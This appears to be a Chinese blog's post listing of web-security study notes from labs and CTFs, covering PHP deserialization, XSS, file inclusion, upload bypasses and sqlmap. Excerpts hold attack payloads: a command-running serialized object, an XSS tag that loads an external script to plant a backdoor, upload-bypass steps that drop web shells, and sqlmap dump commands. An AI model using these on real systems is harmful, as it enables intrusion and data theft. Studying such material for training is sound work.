自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(20)
  • 收藏
  • 关注

原创 PHP反序列化system代码执行

http://192.168.1.5/pop/3.php?x=O:1:"B":1:{s:3:"cmd";s:8:"ipconfig";}

2024-08-11 09:26:09 161

原创 060 PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改

如果一个对象类中存在__toString魔术方法,这个对象类被当做字符串进行处理时,就会触发__toString魔术方法。// echo '__get 不存在成员变量'.$name.'<br>';// // __get():访问不存在的成员变量时调用。//// 不存在成员变量spaceman,所以调用__get。////将对象当做函数调用 触发__invoke魔术方法。// 不存在xiaodi方法 触发__call魔术方法。//// 存在成员变量n,所以不调用__get。

2024-08-09 17:39:15 268

原创 XSS http://xss-ctf.xiejiahe.com/

事件关键字过滤 利用其他标签调用 双引号闭合。、全部实体化 利用标签事件 单引号闭合。、全部实体化 利用标签事件 双引号闭合。、利用Unicode编码(内容检测)、利用Unicode编码。、利用大小写未正则匹配。、实体化 输入框没有。

2024-07-05 15:16:49 312

原创 055 XSS跨站 JS后门植入&CSP策略&HttpOnly

后台用户名输入 <script src="http://1.14.97.254/poc1.js"></script> 访问poc1.js文件触发跨站生成后门文件1.php。内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。禁止加载外域代码,防止复杂的攻击逻辑。,利于尽快修复问题。

2024-07-04 23:54:34 141

原创 050 文件删除

于是我们在../templets../index.php。只允许../templets文件夹里面的文件。就能翻过文件夹删除其他文件。

2024-06-08 22:22:17 150

原创 050 命令

读取flag.php。

2024-06-08 10:08:46 121

原创 050 文件包含testphp.vulnweb.com/showimage.php?file=showimage.php

靶场地址testphp.vulnweb.com/showimage.php?

2024-06-08 09:35:05 237

原创 050 伪协议文件读取&文件写入&代码执行

伪协议文件读取文件读取: ../上级目录绝对路径file相对路径php。

2024-06-08 09:27:40 333 1

原创 048 Apache HTTPD 换行解析漏洞(CVE-2017-15715)

加个空格改成0a 然后访问 存在解析漏洞。

2024-06-07 01:46:26 85

原创 047 代码缺陷

【代码】047 代码缺陷。

2024-06-05 06:49:25 122

原创 047 PHP上传 6-10题 黑名单&%00截断&黑名单缺陷&逻辑缺陷

PHP 内核是由 C 语言实现的,所以使用了 C 语言中的一些字符串处理函数。所以在这个地方,攻击者只要在最后加入一个 0 字节,就能截断 file 变量之后的字符串 PHP小于5.3版本可以输入a.php%00进行截断。然后不停的访问上传shell.php和不停的访问upload/shell.php就能生成xiao.php。禁止后缀为php的文件上传,由于系统特性区分大小写 于是可以1.PHp上传。写一个shell.php访问就生成一个xiao.php的后门文件。因为在下面 所以要对%00进行解码。

2024-06-05 04:25:39 502

原创 047 php上传1-5关 JS绕过&htaccess&MIME类型&检测头部&逻辑漏洞

通过白名单 只允许上传jpg.png.gif文件改成1.php发送即可。

2024-06-04 02:38:57 922

原创 046 sql-代理

python .\sqlmap.py -u "http://localhost/new.php?id=1" --level=3 --risk=2 --proxy "http://127.0.0.1:8080/"

2024-06-01 19:37:57 100

原创 046-sql等级风险

等级5 风险3压力拉满。

2024-06-01 19:25:10 170

原创 046 sql-过滤

编写过滤脚本文件注入成功。

2024-06-01 18:34:34 296

原创 046 sql-base64

引用模块 --tamper=base64code。注入点是base64编码。引用base64模块。

2024-06-01 17:25:31 261

原创 046 sqlmap-数据包注入

先复制请求表头并保存在sqlmap的跟目录命名为head.txt 再把注入点打上*号。

2024-05-30 17:58:46 628

原创 046 sqlmap-post

所以我们的注入语句应该是:python ./sqlmap.py "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables。抓取登录数据包表单数据:uname=test&pass=test。

2024-05-30 04:54:45 360 1

原创 046 sqlmap-get

id=2" --dump -C "password,username,id" -T "admin" -D "demo01" 得到信息。权限都是有的,莫非我们不是root?emmmm不知道奥哈哈 反正不是root也不能确定。

2024-05-29 08:21:37 1182 2

原创 041 asp

用Linux输入msfconsole设置端口set rhosts 192.168.37.129run蓝屏成功IIS

2024-05-24 02:08:14 1747

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除